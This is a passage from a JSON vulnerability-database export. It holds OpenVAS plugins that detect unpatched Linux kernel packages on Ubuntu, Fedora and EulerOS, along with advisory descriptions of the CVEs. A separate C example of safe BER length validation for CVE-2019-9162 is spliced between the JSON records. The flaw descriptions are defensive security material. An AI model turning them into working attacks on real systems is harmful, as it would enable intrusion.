rls:\"UBUNTU18.10\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) 
{\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:32:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-7222", "CVE-2019-3460", "CVE-2018-19824", "CVE-2019-9003", "CVE-2019-8980", "CVE-2019-8912", "CVE-2019-9162", "CVE-2019-8956", "CVE-2019-7221", "CVE-2019-6974", "CVE-2019-3459", "CVE-2019-9213", "CVE-2019-7308"], "description": "The remote host is missing an update for the ", "modified": "2019-04-26T00:00:00", "published": "2019-04-03T00:00:00", "id": "OPENVAS:1361412562310843959", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843959", "type": "openvas", "title": "Ubuntu Update for linux-azure USN-3930-2", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843959\");\n script_version(\"2019-04-26T08:24:31+0000\");\n script_cve_id(\"CVE-2018-19824\", \"CVE-2019-3459\", \"CVE-2019-3460\", \"CVE-2019-6974\",\n \"CVE-2019-7221\", \"CVE-2019-7222\", \"CVE-2019-7308\", \"CVE-2019-8912\",\n \"CVE-2019-8956\", \"CVE-2019-8980\", \"CVE-2019-9003\", \"CVE-2019-9162\",\n \"CVE-2019-9213\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-04-26 08:24:31 +0000 (Fri, 26 Apr 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-04-03 06:40:38 +0000 (Wed, 03 Apr 2019)\");\n script_name(\"Ubuntu Update for linux-azure USN-3930-2\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU18\\.04 LTS\");\n\n script_xref(name:\"USN\", value:\"3930-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3930-2/\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-azure'\n package(s) announced via the USN-3930-2 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"USN-3930-1 fixed vulnerabilities in\nthe Linux kernel for Ubuntu 18.10. 
This update provides the corresponding\nupdates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 18.10\nfor Ubuntu 18.04 LTS.\n\nMathias Payer and Hui Peng discovered a use-after-free vulnerability in the\nAdvanced Linux Sound Architecture (ALSA) subsystem. A physically proximate\nattacker could use this to cause a denial of service (system crash).\n(CVE-2018-19824)\n\nShlomi Oberman, Yuli Shapiro, and Ran Menscher discovered an information\nleak in the Bluetooth implementation of the Linux kernel. An attacker\nwithin Bluetooth range could use this to expose sensitive information\n(kernel memory). (CVE-2019-3459, CVE-2019-3460)\n\nJann Horn discovered that the KVM implementation in the Linux kernel\ncontained a use-after-free vulnerability. An attacker in a guest VM with\naccess to /dev/kvm could use this to cause a denial of service (guest VM\ncrash). (CVE-2019-6974)\n\nJim Mattson and Felix Wilhelm discovered a use-after-free vulnerability in\nthe KVM subsystem of the Linux kernel, when using nested virtual machines.\nA local attacker in a guest VM could use this to cause a denial of service\n(system crash) or possibly execute arbitrary code in the host system.\n(CVE-2019-7221)\n\nFelix Wilhelm discovered that an information leak vulnerability existed in\nthe KVM subsystem of the Linux kernel, when nested virtualization is used.\nA local attacker could use this to expose sensitive information (host\nsystem memory to a guest VM). (CVE-2019-7222)\n\nJann Horn discovered that the eBPF implementation in the Linux kernel was\ninsufficiently hardened against Spectre V1 attacks. A local attacker could\nuse this to expose sensitive information. (CVE-2019-7308)\n\nIt was discovered that a use-after-free vulnerability existed in the user-\nspace API for crypto (af_alg) implementation in the Linux kernel. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. 
(CVE-2019-8912)\n\nJakub Jirasek discovered a use-after-free vulnerability in the SCTP\nimplementation in the Linux kernel. A local attacker could use this to\ncause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2019-8956)\n\nIt was discovered that the Linux kernel did not properly deallocate memory\nwhen handling certain errors while reading files. A local attacker could\nuse this to cause a denial of service (excessive memory consumption).\n(CVE-2019-8980)\n\nIt was discovered that a use-after-free vulnerability existed in the IPMI\nimplementation in the Linux kernel. A local attacker with access to the\nIPMI character ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'linux-azure' package(s) on Ubuntu 18.04 LTS.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"UBUNTU18.04 LTS\") {\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.18.0-1014-azure\", ver:\"4.18.0-1014.14~18.04.1\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.18.0-17-generic\", ver:\"4.18.0-17.18~18.04.1\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.18.0-17-generic-lpae\", ver:\"4.18.0-17.18~18.04.1\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.18.0-17-lowlatency\", ver:\"4.18.0-17.18~18.04.1\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.18.0-17-snapdragon\", ver:\"4.18.0-17.18~18.04.1\", rls:\"UBUNTU18.04 LTS\"))) {\n 
report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-azure\", ver:\"4.18.0.1014.13\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-generic-hwe-18.04\", ver:\"4.18.0.17.67\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-generic-lpae-hwe-18.04\", ver:\"4.18.0.17.67\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-lowlatency-hwe-18.04\", ver:\"4.18.0.17.67\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-snapdragon-hwe-18.04\", ver:\"4.18.0.17.67\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(!isnull(res = isdpkgvuln(pkg:\"linux-image-virtual-hwe-18.04\", ver:\"4.18.0.17.67\", rls:\"UBUNTU18.04 LTS\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:32:16", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-7222", "CVE-2019-3460", "CVE-2018-19824", "CVE-2019-8980", "CVE-2019-8912", "CVE-2018-16862", "CVE-2019-9162", "CVE-2018-18710", "CVE-2019-7221", "CVE-2019-3701", "CVE-2019-6974", "CVE-2019-3459", "CVE-2018-19407", "CVE-2018-16880"], "description": "The remote host is missing an update for the ", "modified": "2019-05-14T00:00:00", "published": "2019-05-07T00:00:00", "id": "OPENVAS:1361412562310876177", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876177", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2019-7462acf8ba", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can 
redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876177\");\n script_version(\"2019-05-14T05:04:40+0000\");\n script_cve_id(\"CVE-2019-8980\", \"CVE-2019-8912\", \"CVE-2019-7221\", \"CVE-2019-6974\", \"CVE-2019-7222\", \"CVE-2018-16880\", \"CVE-2019-3459\", \"CVE-2019-3460\", \"CVE-2019-3701\", \"CVE-2018-19824\", \"CVE-2018-16862\", \"CVE-2018-19407\", \"CVE-2018-18710\", \"CVE-2019-9162\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-14 05:04:40 +0000 (Tue, 14 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-07 02:37:57 +0000 (Tue, 07 May 2019)\");\n script_name(\"Fedora Update for kernel FEDORA-2019-7462acf8ba\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC29\");\n\n script_xref(name:\"FEDORA\", value:\"2019-7462acf8ba\");\n script_xref(name:\"URL\", 
value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5V6NQPIGUR73VSTY22YLUKTLEB66AA4U\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the FEDORA-2019-7462acf8ba advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The kernel meta package\");\n\n script_tag(name:\"affected\", value:\"'kernel' package(s) on Fedora 29.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC29\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.20.12~200.fc29\", rls:\"FC29\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-02-05T16:41:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9644", "CVE-2013-2894", "CVE-2016-7097", "CVE-2018-14610", "CVE-2017-15274", "CVE-2015-8215", "CVE-2016-4913", "CVE-2017-6001", "CVE-2017-16995", "CVE-2018-7757", "CVE-2015-6526", "CVE-2019-9162", "CVE-2016-6198", "CVE-2014-4652", "CVE-2013-2930", "CVE-2016-4470", "CVE-2014-8133", "CVE-2016-4565", "CVE-2017-17864", "CVE-2019-5489"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-02-05T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220191532", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191532", "type": "openvas", 
"title": "Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1532)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1532\");\n script_version(\"2020-02-05T08:56:28+0000\");\n script_cve_id(\"CVE-2013-2894\", \"CVE-2013-2930\", \"CVE-2014-4652\", \"CVE-2014-8133\", \"CVE-2014-9644\", \"CVE-2015-6526\", \"CVE-2015-8215\", \"CVE-2016-4470\", \"CVE-2016-4565\", \"CVE-2016-4913\", \"CVE-2016-6198\", \"CVE-2016-7097\", \"CVE-2017-15274\", \"CVE-2017-16995\", \"CVE-2017-17864\", \"CVE-2017-6001\", \"CVE-2018-14610\", \"CVE-2018-7757\", \"CVE-2019-5489\", \"CVE-2019-9162\");\n script_tag(name:\"cvss_base\", value:\"7.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-02-05 08:56:28 +0000 (Wed, 05 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 12:06:52 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2019-1532)\");\n script_category(ACT_GATHER_INFO);\n 
script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRTARM64-3\\.0\\.1\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1532\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1532\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'kernel' package(s) announced via the EulerOS-SA-2019-1532 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A flaw was found in the way the Linux kernel's perf subsystem retrieved userlevel stack traces on PowerPC systems. A local, unprivileged user could use this flaw to cause a denial of service on the system by creating a special stack layout that would force the perf_callchain_user_64() function into an infinite loop.(CVE-2015-6526)\n\nA vulnerability was found in the Linux kernel. Payloads of NM entries are not supposed to contain NUL. When such entry is processed, only the part prior to the first NUL goes into the concatenation (i.e. the directory entry name being encoded by a bunch of NM entries). The process stops when the amount collected so far + the claimed amount in the current NM entry exceed 254. However, the value returned as the total length is the sum of *claimed* sizes, not the actual amount collected. 
And that's what will be passed to readdir() callback as the name length - 8Kb __copy_to_user() from a buffer allocated by __get_free_page().(CVE-2016-4913)\n\nThe perf_trace_event_perm function in kernel/trace/trace_event_perf.c in the Linux kernel before 3.12.2 does not properly restrict access to the perf subsystem, which allows local users to enable function tracing via a crafted application.(CVE-2013-2930)\n\nThe mincore() implementation in mm/mincore.c in the Linux kernel through 4.19.13 allowed local attackers to observe page cache access patterns of other processes on the same system, potentially allowing sniffing of secret information. (Fixing this affects the output of the fincore program.) Limited remote exploitation may be possible, as demonstrated by latency differences in accessing public files from an Apache HTTP Server.(CVE-2019-5489)\n\nIt was found that the espfix functionality could be bypassed by installing a 16-bit RW data segment into GDT instead of LDT (which espfix checks), and using that segment on the stack. A local, unprivileged user could potentially use this flaw to leak kernel stack addresses.(CVE-2014-8133)\n\nAn issue was discovered in the btrfs filesystem code in the Linux kernel. An out-of-bounds access is possible in write_extent_buffer() when mounting and operating a crafted btrfs image due to a lack of verification at mount time within the btrfs_read_block_groups() in fs/btrfs/extent-tree.c function. This could lead to a system crash and a denial of service.(CVE-2018-14610)\n\nkernel/bpf/verifier.c in the Linux kernel through 4.14.8 mishandles states_equal comparisons between the pointer data type and the UNKNOWN_VALUE data type, which allows local users to obtain potentially sensitive address information, aka a 'pointer leak.'(CVE-2017-17864) ...\n\n Description truncated. 
Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'kernel' package(s) on Huawei EulerOS Virtualization for ARM 64 3.0.1.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRTARM64-3.0.1.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs-devel\", rpm:\"kernel-tools-libs-devel~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf\", rpm:\"perf~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~4.19.28~1.2.117\", rls:\"EULEROSVIRTARM64-3.0.1.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, 
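The advisories above describe CVE-2019-9162 as insufficient ASN.1 length checks in the SNMP NAT module, with the CVE text naming the snmp_version and snmp_helper decoder callbacks. The following C program is an added example, not the kernel's code and not taken from any of the advisories or plugins on this page: it shows a bounds-checked BER TLV reader and the `datalen` checks a decoder callback needs so that a crafted INTEGER or IpAddress value of the wrong length is rejected instead of being read or written past its bounds. The function names (`ber_read_tlv`, `version_cb`, `ipaddr_cb`, `parse_snmp_header`), the callback signatures and the sample SNMP byte strings are all constructed for illustration and are not the kernel's interfaces.

```c
/* Added example (not kernel code): BER length validation of the kind the
 * CVE-2019-9162 fix concerns. All names and layouts here are illustrative. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

typedef struct {
    uint8_t tag;
    const uint8_t *val;
    size_t len;     /* length of the value octets */
    size_t total;   /* bytes consumed by tag + length + value */
} tlv_t;

/* Read one BER TLV from buf[0..buflen). Returns 1 on success, 0 if the
 * header is truncated, the length form is indefinite or wider than 4 octets,
 * or the claimed length runs past the end of the buffer. */
int ber_read_tlv(const uint8_t *buf, size_t buflen, tlv_t *out)
{
    size_t pos = 0, len = 0;
    if (buflen < 2)
        return 0;
    out->tag = buf[pos++];
    uint8_t l = buf[pos++];
    if (l & 0x80) {                        /* long form: 0x8n, then n length octets */
        unsigned n = l & 0x7f;
        if (n == 0 || n > 4 || n > buflen - pos)
            return 0;                      /* indefinite form or truncated header */
        for (unsigned i = 0; i < n; i++)
            len = (len << 8) | buf[pos++];
    } else {
        len = l;
    }
    if (len > buflen - pos)
        return 0;                          /* value would overrun the buffer */
    out->val = buf + pos;
    out->len = len;
    out->total = pos + len;
    return 1;
}

/* Callback for the SNMP version INTEGER. The datalen check is the kind of
 * check the advisories describe as missing: without it, data[0] is read even
 * when the encoded value has length 0 (out-of-bounds read). */
int version_cb(const uint8_t *data, size_t datalen, int *version)
{
    if (datalen != 1)
        return -1;
    *version = data[0];
    return 0;
}

/* NAT-style callback for an IpAddress value: rewrite old -> repl in place.
 * Without the datalen check a shorter value would receive a 4-byte write
 * (out-of-bounds write). Returns 1 if rewritten, 0 if not matched, -1 if
 * the value has the wrong length. */
int ipaddr_cb(uint8_t *data, size_t datalen, const uint8_t old[4], const uint8_t repl[4])
{
    if (datalen != 4)
        return -1;
    if (memcmp(data, old, 4) != 0)
        return 0;
    memcpy(data, repl, 4);
    return 1;
}

/* Parse the leading SEQUENCE { INTEGER version, OCTET STRING community } of an
 * SNMP message. Returns 1 and sets *version and *community_len on success,
 * 0 on any length violation. */
int parse_snmp_header(const uint8_t *msg, size_t msglen, int *version, size_t *community_len)
{
    tlv_t seq, ver, comm;
    if (!ber_read_tlv(msg, msglen, &seq) || seq.tag != 0x30)
        return 0;
    if (!ber_read_tlv(seq.val, seq.len, &ver) || ver.tag != 0x02)
        return 0;
    if (version_cb(ver.val, ver.len, version) != 0)
        return 0;
    if (!ber_read_tlv(seq.val + ver.total, seq.len - ver.total, &comm) || comm.tag != 0x04)
        return 0;
    *community_len = comm.len;
    return 1;
}

int main(void)
{
    /* Constructed SNMPv1 prefix: SEQUENCE { INTEGER 0, OCTET STRING "public" } */
    const uint8_t good[] = {0x30,0x0b, 0x02,0x01,0x00, 0x04,0x06,'p','u','b','l','i','c'};
    /* Same message, but the version INTEGER claims length 0 */
    const uint8_t zero_len[] = {0x30,0x0a, 0x02,0x00, 0x04,0x06,'p','u','b','l','i','c'};
    int v = -1;
    size_t cl = 0;
    printf("well-formed header accepted: %d\n", parse_snmp_header(good, sizeof good, &v, &cl));
    printf("zero-length version rejected: %d\n", parse_snmp_header(zero_len, sizeof zero_len, &v, &cl));
    return 0;
}
```

The point to carry over to any decoder that dispatches callbacks on tagged values: the generic TLV walker only guarantees that a value fits inside the enclosing buffer, not that it has the width the callback expects, so each fixed-size consumer must check `datalen` itself before indexing or overwriting the value.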
{"lastseen": "2019-05-29T18:32:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-7222", "CVE-2018-13053", "CVE-2018-1108", "CVE-2018-12633", "CVE-2019-3460", "CVE-2018-10840", "CVE-2018-13405", "CVE-2018-13095", "CVE-2018-19824", "CVE-2018-12714", "CVE-2018-11506", "CVE-2018-12232", "CVE-2018-19406", "CVE-2018-10853", "CVE-2019-8980", "CVE-2018-13093", "CVE-2018-17182", "CVE-2019-8912", "CVE-2018-14734", "CVE-2018-16862", "CVE-2018-3646", "CVE-2018-1120", "CVE-2018-5391", "CVE-2019-9162", "CVE-2018-18710", "CVE-2018-3620", "CVE-2019-7221", "CVE-2018-10322", "CVE-2018-15471", "CVE-2019-3701", "CVE-2018-10323", "CVE-2019-6974", "CVE-2019-3459", "CVE-2019-9213", "CVE-2018-14678", "CVE-2018-19407", "CVE-2018-14633", "CVE-2018-16880", "CVE-2018-3639", "CVE-2018-12896", "CVE-2018-13094"], "description": "The remote host is missing an update for the ", "modified": "2019-04-16T00:00:00", "published": "2019-03-12T00:00:00", "id": "OPENVAS:1361412562310875506", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875506", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2019-196ab64d65", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875506\");\n script_version(\"2019-04-16T07:10:04+0000\");\n script_cve_id(\"CVE-2019-8980\", \"CVE-2019-8912\", \"CVE-2019-7221\", \"CVE-2019-6974\", \"CVE-2019-7222\", \"CVE-2018-16880\", \"CVE-2019-3459\", \"CVE-2019-3460\", \"CVE-2019-3701\", \"CVE-2018-19406\", \"CVE-2018-19824\", \"CVE-2018-16862\", \"CVE-2018-19407\", \"CVE-2018-18710\", \"CVE-2018-14633\", \"CVE-2018-17182\", \"CVE-2018-5391\", \"CVE-2018-15471\", \"CVE-2018-3620\", \"CVE-2018-3646\", \"CVE-2018-14734\", \"CVE-2018-14678\", \"CVE-2018-13405\", \"CVE-2018-13053\", \"CVE-2018-12896\", \"CVE-2018-13093\", \"CVE-2018-13094\", \"CVE-2018-13095\", \"CVE-2018-12714\", \"CVE-2018-12633\", \"CVE-2018-12232\", \"CVE-2018-10853\", \"CVE-2018-11506\", \"CVE-2018-10840\", \"CVE-2018-3639\", \"CVE-2018-1120\", \"CVE-2018-10322\", \"CVE-2018-10323\", \"CVE-2018-1108\", \"CVE-2019-9162\", \"CVE-2019-9213\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-04-16 07:10:04 +0000 (Tue, 16 Apr 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-03-12 04:12:28 +0100 (Tue, 12 Mar 2019)\");\n script_name(\"Fedora Update for kernel FEDORA-2019-196ab64d65\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2019-196ab64d65\");\n script_xref(name:\"URL\", 
value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YHY2JYWF6TLQZKNODGRXDHOGVYDUZAHP\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the FEDORA-2019-196ab64d65 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"kernel on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~4.20.14~100.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-04-01T02:36:34", "description": "The 4.20.12 stable update contains a number of important fixes across\nthe tree.\n\nNote that Tenable 